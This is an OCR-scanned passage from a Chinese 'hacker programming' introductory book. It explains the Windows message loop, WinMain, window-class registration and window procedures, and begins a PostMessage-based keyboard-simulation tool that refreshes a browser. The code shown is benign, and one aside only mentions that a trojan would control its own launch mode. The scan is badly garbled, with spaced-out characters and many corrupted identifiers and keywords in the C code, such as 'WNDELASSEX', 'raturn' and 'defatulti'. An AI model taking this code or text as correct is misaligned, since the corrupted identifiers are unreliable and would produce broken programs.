各 个 子 程序 ;在 执行 的 过 程 中 会 等 竺 用 户 的 输入 等 操作 ; 当 各 个 子 程序 执行 完成 后 ， 最 终 会 
返回 main0) 主 函数 ， 执 行 main() 主 函数 的 return 语句 后 ， 程 序 退 出 (其 实 程 序 真 正 的 出 口 也 并 
不 是 main() 函 数 的 return 语句 )。 

2. Windows 程序 执行 流程 

DOS 程序 的 执行 流程 比较 简单 , 但 是 Windows 应 用 程序 的 执行 流程 就 比较 复杂 了 。DOS 
是 单 任务 的 操作 系统 。 在 DOS 中 , 通过 输入 命令 , DOS 操作 系统 会 将 控制 权 由 Command.com 
转交 给 DOS 程序 从 而 执行 。 而 Windows 是 多 任务 的 操作 系统 ， 在 Windows 下 同时 会 运行 若 
干 个 应 用 程序 ， 那么 Windows 就 无 法 把 控制 权 完全 交 给 一 个 应 用 程序 。Windows 下 的 应 用 程 
序 是 如 何 工 作 的 ? 首先 看 一 下 Windows 应 用 程序 内 部 的 大 致 结构 图 ， 如 图 1-7 所 示 。 


从 WinMain 
开始 程序 1 
见 ”系统 程序 模块 
















RegisterClassEx 


注册 窗口 类 

















1 
消息 处 理 1| | 消息 处 理 n 


返回 


DefWindowProc 
处 理 





GetMessage 


获取 消息 















\ 

\ 

\ 
\ 
\ 


Wedd 
ME 
Eg 


图 1-7 Windows 应 用 程序 执行 原理 图 


1-7 可 能 看 起 来 比较 复杂 ， 其 实 Windows 应 用 程序 的 内 部 结构 比 该 示意 图 更 复杂 。 在 
实际 开发 Windows 应 用 程序 时 ， 需 要 关注 的 部 分 主要 是 “ 主 程序 ”和 “窗口 过 程 ”两 部 分 。 
但 是 从 图 1-7 来 看 ， 主 程序 和 窗口 过 程 没 有 直接 的 调用 关系 ， 而 在 主 程序 和 窗口 过 程 之 间 有 
一 个 “系统 程序 模块 ”。“ 主 程序 ”的 功能 是 用 来 注册 窗口 类 、 获 取消 息 和 分 发 消息 。 而 “ 窗 
口 过 程 ” 中 定义 了 需要 处 理 的 消息 ,“ 窗 口 过 程 ” 会 根据 不 同 的 消息 执行 不 同 的 动作 ， 而 不 需 
要 程序 处 理 的 消息 则 会 交 给 默认 的 系统 过 程 进行 处 理 。 

在 “ 主 程序 ”中 ，RegisterClassEx() 冰 数 会 注册 一 个 窗口 类 ， 窗 口 类 中 的 字段 中 包含 了 “窗口 
过 程 ” 的 地 址 信息 ， 也 就 是 把 “窗口 类 ”的 信息 (包括 “窗口 过 程 的 地 址 信息 ”) 告诉 操作 系统 。 
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然后 “ 主 程 序 ” 不 断 通过 调用 GetMessage0 函 数 获取 消息 ， 再 交 由 DispatchMessge() 函 数 来 分 发 消 
息 。 消 息 分 发 后 并 没有 直接 调用 “窗口 过 程 ” 让 其 处 理 消息 ， 而 是 由 系统 模块 查找 该 窗口 指定 的 
窗口 类 ， 通 过 窗口 类 再 找到 窗口 过 程 的 地 址 ， 最 后 将 消息 送 给 该 窗口 过 程 ， 由 窗口 过 程 处 理 消息 。 


1.2.2 一 个 简单 的 Windows 应 用 程序 


相对 一 个 简单 的 DOS 程序 来 说 一 个 简单 的 Windows 应 用 程序 要 很 长 。 下 面 的 例子 中 只 
实现 了 一 个 特别 简单 的 Windows 程序 ， 这 个 程序 在 桌面 上 显示 一 个 简单 的 窗口 ， 它 没有 菜单 
栏 、 工 具 栏 、 状 态 栏 ， 只 是 在 窗口 中 输出 一 段 简单 的 字符 串 。 虽 然 程 序 如 此 简单 ， 但 是 也 要 
编写 100 行 左 右 的 代码 。 考虑 到 初学 的 读者 , 这 里 将 一 部 分 一 部 分 地 逐步 介绍 代码 中 的 细节 ， 
以 减少 代码 的 长 度 ， 从 而 方便 初学 者 的 学 习 。 

1. Windows 窗口 应 用 程序 的 主 函 数 一 一 WinMain() 

在 DOS 时代， 或 编写 Windows 下 的 命令 行 的 程序 ， 要 使 用 C 语言 编写 代码 的 时 候 都 是 
从 main0 函 数 开始 的 。 而 在 Windows 下 编写 有 窗口 的 程序 时 ， 要 用 C 语言 编写 窗口 程序 就 不 
再 从 main() 函 数 开 始 了 ， 取 而 代 之 的 是 WinMain() 函 数 。 

既然 Windows 应 用 程序 的 主 函 数 是 WinMain()， 那 么 就 从 了 解 WinMain() 函 数 的 定义 开 
始 学 习 Windows 应 用 程序 的 开发 。WinMain() 函 数 的 定义 如 下 : 

int WINAPI WinMain'( 

HINSTANCE hinstance, 
HINSTANCE hpPrevinstance, 
LPSTR lpCmdLine, 

、 nk nCmdShow 

该 函数 的 定义 取 自 MSDN 中 ,在 看 到 WinMain0 函 数 的 定义 后 ,很 直观 地 会 发 现 WinMain 
函数 的 参数 比 main0) 函 数 的 参数 变 多 了 。 从 参数 个 数 上 来 说 ，WinMain() 函 数 接收 的 信息 更 多 
了 。 下 面 来 看 每 个 参数 的 含义 。 

hInstance 是 应 用 程序 的 实例 句柄 。 保 存在 磁盘 上 的 程序 文件 是 静态 的 ， 当 被 加 载 到 内 存 
中 时 ， 被 分 配 了 CPU、 内 存 等 进程 所 需 的 资源 后 ， 一 个 静态 的 程序 就 被 实例 化 为 一 个 有 各 
种 执行 资源 的 进程 了 。 句 柄 的 概念 随 上 下 文 的 不 同 而 不 同 ， 句 柄 是 操作 某 个 资源 的 “把 手 ” 
当 需 要 对 某 个 实例 化 进程 操作 时 ， 需 要 借助 该 实例 句柄 进行 操作 。 这 里 的 实例 句柄 是 程序 装 入 
内 存 后 的 起 始 地 址 。 实 例句 柄 的 值 也 可 以 通过 GetModuleHandle() 参 数 来 获得 (注意 系统 中 没 
有 GetmstanceHandle() 函 数 ， 不 要 误 以 为 是 hInstance 就 会 有 GetInstancexxx() 类 的 函数 )。 


Dy 注 : 句柄 这 个 词 在 开发 Windows 程序 时 是 非常 常见 的 一 个 词 。“ 句 柄 ”一 词 的 含义 随 上 下 文 的 不 同 而 所 有 

改变 。 比 如 ， 磁 盘 上 的 程序 文件 被 加 载 到 内 存 中 后 ， 就 创建 了 一 个 实例 句柄 ， 这 个 实例 句柄 是 程序 装 入 内 
存 后 的 “起 始 地 址 ”, 或 者 说 是 “模块 的 起 始 地 址 ”。 而 在 前 面 介绍 的 FindWindow() 函 数 和 SendMessage() 
函数 中 也 提 到 了 “句柄 ”这 个 词 ， 而 这 时 的 “句柄 ”相当 于 某 个 资源 的 “把 手 ” 或 “面板 ”。 


拿 SendMessage() 函 数 举例 来 说 , 句柄 相当 于 一 个 操作 的 面板 , 对 句柄 发 送 的 消息 相当 于 
面板 上 的 各 个 开关 按键 ， 消 息 的 附加 数据 ， 相 当 于 给 开关 按键 送 的 各 种 参数 ， 这 些 参数 根据 
按键 的 不 同 而 不 同 。 

hPrevInstance 是 同一 个 文件 创建 的 上 一 个 实例 的 实例 句柄 。 这 个 参数 是 Win16 平台 下 的 
遗留 物 ， 在 Win32 下 已 经 不 再 使 用 了 。 
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lpCmdLine 是 主 函数 的 参数 ， 用 于 在 程序 启动 时 给 进程 传递 参数 。 比 如 在 “开始 ”菜单 
的 “运行 ”中 输入 “notepad ci\boot.ini ”这 样 就 通过 记事 本 打开 了 C 盘 下 的 boot.ini 文件 。 
C:\Boot.ini 文件 是 通过 WinMain0) 函 数 的 jpCmdLine 参数 传递 给 notepad.exe 程序 的 。 
nCmdShow 是 进程 显示 的 方式 ， 可 以 是 最 大 化 显示 、 最 小 化 显示 ， 或 者 是 隐藏 等 显示 方 
式 〈 如 果 是 启动 木马 程序 的 话 ， 启 动 方式 当然 要 由 自己 进行 控制 )。 
主 函 数 的 参数 都 介绍 完了 。 编 写 Windows 的 窗口 程序 ， 需 要 主 函 数 中 应 该 完成 哪些 操作 
是 下 面 要 讨论 的 内 容 。 
2. WinMain() 函 数 中 的 流程 
编写 Windows 下 的 窗口 程序 ， 在 WinMain() 主 函数 中 主要 完成 的 任务 是 注册 一 个 窗口 类 ， 
创建 一 个 窗口 并 显示 创建 的 窗口 ， 然 后 不 停 地 获取 属于 自己 的 消息 并 分 发 给 自己 的 窗口 过 程 ， 
直到 收 到 WM_QUIT 消息 后 退出 消息 循环 结束 进程 。 这 是 主 函数 中 程序 的 执行 脉络 ， 程 序 中 
将 注册 窗口 类 、 创 建 窗口 的 操作 封装 为 自 定义 函数 。 
代码 如 下 : 
int WINAPI WinMain( 
HINSTANCE hinstance, 
HINSTANCE hpPrevIinstance, 


LPSTR lpCmdLine, 
了 nt nCmdShow) 


MSG Msg; 
BOOE bRet; 


// 注册 窗口 类 
MyRegisterClass (hInstance); 


// 创建 窗口 并 显示 窗口 
if ( !InitInstance (hIinstance, SW SHOWNORMAL) ) 
{ 
return FALSE; 
} 


// 消息 循环 ， 
// 获取 属于 自己 的 消息 并 进行 分 发 
while( (PRet = GetMessage(&Msg，NULL，0，0)) != 0 ) 
{ 

i£ ( bRet == -1 ) 

{ 

” // handle the error and possibly exit 

break; 


} 
else 
{ 
TranslateMessage (&Msg); 
DispatchMessage (gMsg)? 
} 
} 


return Msg.wParam; 
} 


在 代码 中 ，MyRegisterClass() 和 InitInstance() 是 两 个 自 定义 的 函数 ， 分 别 用 来 注册 窗口 
类 ， 创 建 窗口 并 显示 更 新 创建 的 窗口 。 后 面 的 消息 循环 部 分 用 来 获得 消息 并 进行 消息 分 发 。 
它 的 流程 如 图 1-7 所 示 的 “ 主 程序 ”部 分 。 

代码 中 主要 是 3 个 函数 ， 分 别 是 GetMessage()、TranslateMessage() 和 DispatchMessage()。 





中 
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这 3 个 函数 是 Windows 提供 的 API 函数 。GetMessage() 的 定义 如 下 : 
BOOL GetMessagel 
LPMSG lpMsg, 
HWND hwnad, 
UINT wMsgFilterMin, 
UINT wMsgFilterMax 
) 


该 函数 用 来 获取 属于 自己 的 消息 ， 并 填充 MSG 结构 体 。 有 一 个 类 似 于 GetMessage() 的 
函数 是 PeekMessage()， 它 可 以 判断 消息 队列 中 是 否 有 消息 ， 如 果 没 有 消息 ， 可 以 主动 让 出 
CPU 时 间 给 其 他 进程 。 关 于 PeekMessage() 函 数 的 使 用 ， 请 参考 MSDN: 


BOOL TranslateMessageé (CONST MSG *1pMsg) 
该 函数 是 用 来 处 理 键盘 消息 的 。 它 将 虚拟 码 消息 转换 为 字符 消息 , 也 就 是 将 WM_KEYDOWN 
消息 和 WM_KEYUP 消息 转换 为 WM_CHAR 消息 , 将 WM _ SYSKEYDOWN 消息 和 WM_SYSKEYUP 


消息 转换 为 WM _SYSCHAR 消息 : 
LRESULT DispatchMessage (CONST MSG *1pmsg) : 


该 函数 是 将 消息 分 发 到 窗口 过 程 中 。 

3. 注册 窗口 类 的 自 定义 函数 

在 WinMain(0 函 数 中 ， 首 先 调用 了 MyRegisterClass(O 这 个 自 定义 函数 ， 需 要 传递 进程 的 实例 
句柄 hInstance 作为 参数 。 该 函数 完成 窗口 类 的 注册 ， 分 为 两 步 : 第 一 步 是 填充 WNDCLASSEX 
结构 体 ， 第 二 步 是 调用 RegisterClassEx() 函 数 进 行 注 册 。 该 函数 相对 简单 ， 但 是 ， 该 函数 中 
稍微 复杂 的 是 WNDCLASSEX 结构 体 的 成 员 较 多 。 

代码 如 下 : 


ATOM MyRegisterClass (HINSTANCE hIinstance) 


{ 
WNDELASSEX WndCls; 


// 填充 结构 体 为 0 
ZeroMemory (&WndCls, sizeof (WNDCLASSEX)),; 


//_ cbsize 是 结构 体 大 小 

WndCls.cbSize = sizeof (WNDCLASSEX);} 

// lpfnWndProc 是 窗口 过 程 地 址 

Wndcls.1lpfnWndProsc = WindowProc; 

// hinstance 是 实例 名 炳 

WndCls.hIinstance = hInstance; 

// lpszClassName 是 窗口 类 类 名 

WndCls.lpszClassName = CLASSNAME; 

// style 是 窗口 类 风格 

WndCls.style = CS HREDRAW | CS, VREDRAW; 

// hbrBackground 是 窗口 类 背景 色 

WndCls.hbrBackground = (HBRUSH) COLOR WINDONWERAME + 17 
// hcursor 是 鼠标 句柄 

WndCcls.hCursor = LoadCursor (NULL, TDC ARROW); 

// hIicon 是 图 标 句 柄 

wndcls..hlieon = IEoagrcona (NULL, 1DT QUESTITON) : 

// 其 他 
WndCls'.cbClsExtra 
WndCls.cbWwndExtra 





O°; 
Ql 


La 


return RegisterClassEx(&WndCls); 
} 


在 代码 中 ，WNDCLASSEX 结构 体 的 成 员 都 介绍 了 。WNDCLASSEX 中 最 重要 的 字段 是 
lpfnWndProc， 它 将 保存 的 是 窗口 过 程 的 地 址 。 窗 口 过 程 是 对 各 种 消息 进程 处 理 的 “汇集 地 风 
也 是 编写 Windows 应 用 程序 的 重点 部 分 。 代 码 中 的 函数 都 比较 简单 , 主要 涉及 LoadCursor()、 
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LoadIcon() 和 RegisterClassEx() 这 3 个 函数 。 由 于 这 3 个 函数 使 用 简单 ， 通 过 代码 就 可 以 进行 
理解 ， 这 里 不 做 过 多 介绍 。 

注册 窗口 类 ( 提 到 窗口 类 ， 你 是 否 想 到 了 FindWindow() 函 数 的 第 一 个 参数 呢 ?) 的 
重点 是 在 后 面 的 代码 中 可 以 根据 该 窗口 类 创建 该 种 类 型 的 窗口 。 代 码 中 , 在 定义 窗口 类 时 
指定 了 背景 色 、 鼠 标 指 针 、 窗 口 图 标 等 ， 那 么 使 用 该 窗口 类 创建 的 窗口 都 具有 相同 的 窗口 
类 型 。 

4. 创建 主 窗口 并 显示 更 新 

注册 窗口 类 后 ， 根 据 该 窗口 类 创建 具体 的 主 窗口 并 显示 和 更 新 窗口 。 

代码 如 下 : 

BOOL InitInstance (HINSTANCE hinstance; int nemdShow) 


{ 
. HWND hWnd = NULL; 
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// 创建 窗 日 

hWnd = CreateWindowEx (WS EX CLIENTEDGE, 
CLASSNAME, 
"MyFirstWindow", 


WS_OVERLAPPEDWINDONW, 

CW_USEDEFAULT, CW USEDEFAULT, 
CW USEDEFAULT, CW USEDEFAULT, 
NULL, NULL, hIinstance, NULL); 


if ( NULL == hWnd ) 
{ 

return FALSE; 
} 


// 显示 窗口 

ShowWindow (hWnd, ncmdqShow) : 
// 更 新 窗口 

UpdateWindow (hWnd); 


raturn TRUE 
} 


在 调用 该 函数 时 ， 需 要 给 该 函数 传递 实例 句柄 和 窗口 显示 方式 两 个 参数 。 这 两 个 参数 的 
第 1 个 参数 通过 WinMain() 函 数 的 参数 hInstance 指定 ， 第 2 个 参数 可 以 通过 WinMain() 函 数 
的 第 3 个 参数 指定 ， 也 可 以 进行 自 定 义 指定 。 程 序 中 的 调用 代码 如 下 : 


InitIinstance (hInstance, SW_SHOWNORMAL); 


在 创建 主 窗口 时 调用 了 CreateWindowEx() 函 数 ， 先 来 看 看 它 的 函数 原型 : 
HWND CreateWindowEx! 
DWORD dwExStyle, 
LPCTSTR lpClassName, 
LPCTSTR lpWindowName, 
DWORD dwStyle, 
Tt 
Bt 
int nWidth;, 
int nHeight, 
HWND hwndpParent, 
HMENU hMenu, 
HINSTANCE hInstance, 
LPVOID lpParam 
) 7 


CreateWindowEx() 中 的 第 2 个 参数 是 jpClassName， 由 注释 可 以 知道 是 已 经 注册 的 类 名 。 
这 个 已 经 注册 的 类 名 就 是 WNDCLASSEX 结构 体 的 lpszClassName 字段 。 
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5. 处 理 消息 的 窗口 过 程 

按照 如 图 1-7 所 示 的 流程 ,，WinMain() 主 函数 的 部 分 已 经 都 实现 完成 了 。 接 下 来 看 程序 中 
关键 的 部 分 一 一 窗口 过 程 。 从 WinMain() 主 函数 中 看 出 , 在 WinMain() 主 函数 中 没有 任何 地 方 
直接 调用 窗口 过 程 ， 只 是 在 注册 窗口 类 时 指定 了 窗口 过 程 的 地 址 。 那 么 窗口 类 是 由 谁 进行 调 
用 的 呢 ? 答案 是 由 操作 系统 进行 调用 的 。 原 因 有 二 ， 首 先 窗 口 过 程 的 地 址 是 由 系统 维护 的 ， 
注册 窗口 类 时 是 将 “窗口 过 程 的 地 址 ”向 操作 系统 进行 注册 。 其 次 是 除了 应 用 程序 本 身 会 调 
用 自己 的 窗口 过 程 外 ， 其 他 应 用 程序 也 会 调用 自己 的 窗口 过 程 ， 比 如 前 面 的 例子 中 调用 
SendMessage() 函 数 发 送 消息 后 ， 需 要 系统 调用 目标 程序 的 窗口 过 程 来 完成 相应 的 动作 。 如 果 
窗口 过 程 由 自己 调用 , 那么 窗口 就 要 自己 维护 窗口 类 的 信息 , 进程 间 消 息 的 通信 会 非常 繁琐 ， 
也 会 无 形 中 增加 系统 的 开销 。 

窗口 过 程 的 代码 如 下 : 


LRESULT CALLBACK WindowProc!( 
HWND hwnd, 
UINT uMsg, 
WPARANM wParam;, 
LPARAM lParam) 


PAINTSTRUCT ps; 
HDC hpe; 
RECT rty 


char *pszDrawText = "Hello Windows Program."; 
switch (uMsg) 

{ 

case WM PAINT: 


hpbC = BeginPaint (hwnd, &ps); 
GetClientRect (hwnd, &rt); 
DrawTextA (hDCc, 
pszbDrawText, strlen(pszDrawText),&rt, 
DT _ CENTER | DT VCENTER | DT _ SINGLEELITINE); 
EndPaint (hwnd, &ps); 
break; 
} 
case WM CLOSE: 
{ 


if ( IDYES == MessageBox (hwnd, 
"是 否 退 出 程序 "，"MyFirstWin", MB_YESNO) ) 
{ 
DestroyWindow (hwnd); 
PostQuitMessage (0); 
} 
break; 
} 
defatulti 
{ 
return DefWindowProc (hwnd, uMsg, wParam, lParam); 
} 
} 


return 07 


} 

在 WinMain() 函 数 中 ， 通 过 调用 RegisterClassEx() 函 数 进 行 了 窗口 类 的 注册 ， 通 过 调用 
CreateWindowEx() 函 数 创建 了 窗口 ， 并 且 GetMessage() 函 数 不 停 地 获取 消息 ， 但 是 在 主 函数 中 
没有 对 被 创建 的 窗口 做 任何 处 理 。 那 是 因为 真正 对 窗口 行为 的 处 理 全 部 放 在 了 窗口 过 程 中 。 当 


写 > 沿革 啊 酒 山 一 惧 


| 





中 








”第 1 章 黑客 编程 入 门 








一 > 前 兴 员 钉 ” 击 二 溃 


WinMain() 函 数 中 的 消息 循环 得 到 消息 以 后 , 通过 调用 DispatchMessage() 函 数 将 消息 派发 ( 实 
际 不 是 由 DispatchMessage() 函 数 直 接 派 发 ) 给 了 窗口 过 程 ， 从 而 由 窗口 过 程 对 消息 进行 处 理 。 
窗口 过 程 的 定义 是 按照 MSDN 上 给 出 的 形式 进行 定义 的 ，MSDN 上 的 定义 形式 如 下 : 
LRESULT CALLBACK WindowBProc( 
HWND hwnad, 
UINT uMsg, 
WPARAM wParam, 
LPARAM lParam 
让 
WindowProc 是 窗口 过 程 的 函数 名 , 这 个 函数 名 可 以 随意 改变 , 但 是 该 窗口 过 程 的 函数 名 
必须 与 WNDCLASSEX 结构 体 中 lpfnWndProc 的 成 员 变 量 的 值 一 致 函数 的 第 1 个 参数 hwnd 
是 窗口 的 句柄 ， 第 2 个 参数 uMsg 是 消息 值 ， 第 3 个 和 第 4 个 参数 是 对 于 消息 值 的 附加 参数 。 
这 4 个 参数 的 类 型 与 SendMessage() 函 数 的 参数 相对 应 。 
上 面 WindowProc() 窗 口 过程 中 只 对 两 个 消息 进行 了 处 理 ， 分 别 是 WM_PAINT 和 WM_CLOSE。 
这 里 为 了 演示 因此 只 简单 处 理 了 两 个 消息 。Windows 中 有 上 千 种 消息 ， 那 么 多 的 消息 不 可 能 
全 部 都 由 程序 员 自 己 去 处 理 ， 程 序 员 只 处 理 一 些 程序 中 需要 的 消息 ， 其 余 的 消息 就 交 给 了 
DefWindowProc() 函 数 进行 处 理 。DefWindowProc() 函 数 实际 上 是 将 消息 传递 给 了 操作 系统 ， 
由 操作 系统 来 处 理 程序 中 没有 处 理 的 消息 。 比 如 ， 在 调用 CreateWindow() 函 数 时 ， 系 统 会 发 
送 消息 WM_CREATE 给 窗口 过 程 ， 但 是 这 个 消息 可 能 对 程序 的 功能 并 不 需要 进行 特殊 的 处 
理 ， 因 此 直接 交 由 DefWindowProc() 函 数 让 系统 进行 处 理 。 
DefWindowProc() 函 数 的 定义 如 下 : 


LRESULT DefWindowProc'( 
HWND hwnd, 
UINT Msg, 
WPARAM wParam, 
LPARAM lParam 

)3 


该 函数 的 4 个 参数 跟 窗 口 过 程 的 参数 相同 , 只 要 将 窗口 过 程 的 参数 依次 传递 给 DefWindowProc() 
函数 就 可 以 完成 该 图 数 的 调用 。 在 switch 分 支 结构 中 的 default 位 置 直接 调用 DefWindowProc() 
函数 就 可 以 了 。 

WM_ CLOSE 消息 是 关闭 窗口 时 发 出 的 消息 ， 在 这 个 消息 中 需要 调用 DestoryWindow() 
函数 来 销毁 窗口 ， 并且 调用 PostQuitMessage() 来 退出 消息 循环 , 使 程序 退出 。 对 于 WM_PAINT 
消息 ， 这 里 不 进行 介绍 ， 涉 及 的 几 个 API 函数 可 以 参考 MSDN 进行 了 解 。 

有 的 资料 在 介绍 消息 循环 时 会 给 出 一 个 建议 ， 就 是 把 需要 经 常 处 理 的 消息 放 到 程序 靠 上 
的 位 置 ， 而 将 不 经 常 处 理 的 消息 放 到 程序 靠 下 的 位 置 ， 从 而 提高 程序 的 效率 。 其 实 ， 在 窗口 
过 程 中 往往 会 使 用 switch 结构 对 消息 进行 判断 〈 如 果 使 用 让 和 else 结构 进行 消息 的 判断 ， 那 
么 常用 的 消息 是 要 放 到 前 面 )， 而 switch 结构 在 编译 器 进行 编译 后 会 进行 优化 处 理 ， 从 而 大 
大 提高 程序 的 运行 效率 。 关 于 switch 结构 的 优化 ， 我 们 将 在 其 他 章节 进行 介绍 。 
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鼠标 和 键盘 的 操作 也 会 被 转换 为 相应 的 系统 消息 ， 窗 口 过 程 中 在 接收 到 鼠标 或 键盘 消息 
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后 会 进行 相应 的 处 理 。 通 过 前 面 的 内 容 了 解 到 ， 可 以 通过 SendMessage() 和 PostMessage() 发 
送 消息 到 指定 的 窗口 过 程 中 ， 那 么 使 用 这 两 个 函数 来 发 送 鼠 标 和 键盘 的 相关 消息 就 可 以 进行 
鼠标 和 键盘 的 模拟 操作 。 除 了 SendMessage() 和 PostMessage() 外 ， 还 可 以 通过 keybd_event() 
和 mouse_event() 两 个 专用 的 函数 进行 鼠标 和 键盘 按键 的 模拟 操作 。 关 于 鼠标 和 键盘 按键 的 模 
拟 的 用 处 就 不 多 说 了 ， 想 必 读 者 都 是 知道 的 。 


1.3.1 基于 发 送 消息 的 模拟 


通过 前 面 的 介绍 ， 我 们 已 经 明白 ，Windows 的 应 用 程序 是 基于 消息 机 制 的 ， 对 于 鼠标 和 
键盘 的 操作 也 会 被 系统 转化 为 相应 的 消息 。 首 先 来 学 习 如 何 通过 发 送 消 息 进行 鼠标 和 键盘 的 
模拟 操作 。 

1. 鼠标 、 键 盘 按 键 常 用 的 消息 

无 论 是 鼠标 指针 《或 光标 ) 的 移动 、 单 击 ， 还 是 键盘 的 按键 ,通常 在 Windows 应 用 程序 
中 都 会 转换 成 相应 的 消息 。 在 操作 鼠标 时 ， 使 用 最 多 的 是 移动 鼠标 和 单 击 鼠标 键 。 比 如 ， 在 教 
新 手 使 用 计算 机 时 会 告诉 他 , 将 鼠标 指针 (或 光标 ) 移动 到 “我 的 电脑 ”上 ， 然 后 单 击 鼠 标 右键 ， 
在 弹出 的 快捷 菜单 中 用 鼠标 左 键 单 击 选择 “属性 ”对 话 框 。 当 移动 鼠标 光标 的 时 候 ， 系 统 中 对 应 
的 消息 是 WM_MOUSEMOVE 消息 ， 按 下 鼠标 左 键 时 的 对 应 的 消息 是 WM_LBUTTONDOWN,， 
释放 鼠标 左 键 时 , 对 应 的 消息 是 WM_LBUTTONUP。 在 系统 中 , 鼠标 的 消息 有 很 多 。 在 MSDN 
中 查询 到 的 鼠标 消息 如 图 1-8 所 示 。 

同样 ， 在 系统 中 也 定义 了 键盘 的 按 下 与 抬 起 的 消息 。 键 盘 按 下 的 消息 是 WM_KEYDOWN， 
与 之 对 应 的 键盘 抬 起 的 消息 是 WM_KEYUP。 除 了 这 两 个 消息 外 ， 还 有 一 个 消息 是 比较 常用 的 ， 
这 个 消息 在 前 面 介 绍 消息 循环 时 提 到 过 ， 就 是 WM_CHAR 消息 。 键 盘 的 消息 相对 于 鼠标 要 
少 很 多 ， 在 MSDN 中 查询 到 的 键盘 消息 如 图 1-9 所 示 。 





Mouse Input Messages 
The following messages are Used with mouse input, 
WM_APPECO 





WH™ CAPTURECHANGED 
WM LBUTFTONDBLG 
WwW™ CBUTTONDOWN 





Wn MBUTTOND OW 


WM PSEAL TEVATE 
W™M MOWSEH 
Ww™ MOUSELEAVE 











WH _NCLBUTTONDOWN Keyboard Input Messages 
WM _ NCLBUTTONUP 
WH _ NCMBUTTONDBLCLK The following messages are Used to receive and process keyboard input. 
WM NCMBUTTONDOWN WM A ATE 
WM NEMBUTTONUP WM APPCOMMAND 
WM NCMOUSEHOVER 
WM NCMOUSELEAVE WM DEADCHAR 
WM NCMOUSEMOVE WM GETHOTKEY 
WM NCRBUTTONDHLCLK WM _ HOTKEY 





W™ NCRBUJTTONDOWN WM KEYDOWN 
Mm KEYUP 





WM NCRBUTTONUP 
W™M NCXBUTTONDBLCLK 


WM KILLFOCUS 
WM NCXBUTTIONDOWN Ms 





Ww™ BUTTONUP 
WwW UTTONDBLCLK ee 
wm RN 

WM SYSDEADCHAR 
WM RBUTTONUP WM SYSKEYDOWN 


WH™ XBUTTONDBLCLK 
WH XBUTTONDOWN 
WM _X8UTTONUP WM UNICHAR 

















1-8 ”鼠标 相关 消息 图 1-9 ”键盘 相关 消息 
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2. PostMessage() 函 数 对 键盘 按键 的 模拟 
通过 前 面 的 介绍 , 我 们 已 经 知道 ， PostMessage() 和 SendMessage() 这 两 个 函数 可 以 对 指定 
的 窗口 发 送 消 息 。 既 然 鼠 标 和 键盘 按键 的 操作 被 系统 转换 为 相应 的 消息 ， 那 么 就 可 以 使 用 
PostMessage() 和 SendMessage() 通 过 按 鼠 标 和 键盘 按键 发 送 的 消息 来 模拟 它们 的 操作 。 对 于 模 
拟 键 盘 按键 消息 ， 最 好 使 用 PostMessage() 而 不 要 使 用 SendMessage()。 在 很 多 情况 下 ， 
SendMessage() 是 不 会 成 功 的 。 

现在 编写 一 个 简单 的 小 工具 ， 它 通过 PostMessage() 函 数 模 拟 键 盘 发 送 ( 发 送 F5 键 的 消 
息 来 模拟 网 页 的 刷新 ) 的 信息 来 刷新 网 页 。 首 (pepmpegsgeyyai 
先 打开 VC6.0, 创建 一 个 MFC 对 话 框 工程 ， 按 
照 图 1-10 所 示 设 置 界面 。 

按照 图 1-10 所 示 的 界面 进行 布局 ， 然 后 
为 “开始 ”按钮 设置 控件 变量 。 这 个 小 程序 在 
“IE 浏览 器 标题 ”处 输入 要 刷新 的 页 面 的 标题 ， 
在 “刷新 频率 ”处 输入 一 个 刷新 的 时 间 间 隔 ， 








IDC_EDIT_INTERVAL| IDpc_BTN_ START 


单位 是 秒 IDC_EDIT CAPTION 
当 了 解 程序 的 功能 并 且 将 程序 的 界面 布置 图 1-10 模拟 键盘 刷新 网 页 界面 布局 


好 以 后 , 就 可 以 开始 编写 程序 的 代码 了 。 程序 的 代码 分 为 两 部 分 , 第 一 部 分 是 程序 要 处 理 “ 开 
始 ” 按 钮 的 事件 ， 第 二 部 分 是 要 按照 指定 的 时 间 间 隔 对 指定 的 浏览 器 发 送 按 F5 键 的 消息 来 
刷新 网 页 。 

首先 来 编写 响应 “开始 ”按钮 事件 的 代码 ， 双 击 “ 开 始 ” 按 钮 来 编写 它 的 响应 事件 。 代 
码 如 下 : 


void CKeyBoardDlg: :OnBtnSstart () 


// TODO:; Add your control notification handler code here 
CString strBtne 
int ninterval = 07 


并 i 
DigItemText (IDC EDIT CAPTION, m StrCaption); 
7 “获取 输入 的 刷新 频率 
nIinterval = GetDlgIitemIint (IDC EDIT_ INTERVAL, FALSE, TRUE); 


// 判断 输入 的 值 是 否 非法 
if ( m StrCaption ==""|| niIinterval == 0 ) 
{ 
return ? 
4 


// 获取 按钮 的 标题 
m Start.GetWindowText (strBtn); 


TSEEBEOTEED 并 始 正 ) 


// 设置 定时 器 
SetTimer (1, nIinterval * 1000, NULL); 
m_ Start.SetWindowText ("停止 ")， 
GetD19Iterm(IDC EDIT CAPTION) ->EnableWindow (FALSE); 
GetDlgItem(IDC EDIT INTERVAL)->EnableWindow (FALSE); 
} 
else 
{ 
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// 结束 定时 器 

KillTimer (1); 

m Start.SetwindowText ("开始 "); 

GetDlgIitem (IDGC EDIT CAPTION) ->EnableWindow (TRUE); 

GetDlgIitem(IDG EDIT INTERVAL)->EnableWindow (TRUE); 
} 


} 

在 代码 中 ， 首 先 判 断 按钮 的 文本 ， 如 果 是 “开始 ” 则 通过 SetTimer() 函 数 设置 一 个 定时 
器 ; 如果 按 钮 的 文本 不 是 “开始 ”， 则 通过 KillTimer() 函 数 关 闭 定时 器 。 

这 里 的 SetTimer() 和 KillTimer() 是 MFC 中 CWnd 类 的 两 个 成 员 函 数 ,不 是 API 函数 。 很 
多 MFC 中 的 类 成 员 函 数 和 API 函数 的 写法 是 一 样 的 ， 但 是 它们 还 是 有 区 别 的 。 比 较 一 下 
SetTimer() 在 MFC 中 的 定义 和 API 函数 的 定义 的 差别 。 

MFC 中 的 定义 如 下 : 


UINT SetTimer!( 
UINT nIDEvent, 
UINT nglapse, 
void (CALLBACK EXPORT* lpfnTimer) ( 
HWND, UINT, UINT, DWORD) ); 


API 函数 的 定义 如 下 : 
UINT_PTR SetTimer!( 
HWND hWnd, 
UINT PTR niDEvent, 
UINT UElapse, 
TIMERPROC lpTimerFunc 


从 定义 中 可 以 看 出 ，MFC 中 SetTimer0) 函 数 的 定义 比 API 中 SetTimer(0) 函 数 的 定义 少 了 
一 个 参数 ， 即 HWND 的 窗口 句柄 的 参数 。 在 MFC 中 ， 窗 口 相关 的 成 员 函 数 都 不 需要 指定 窗 
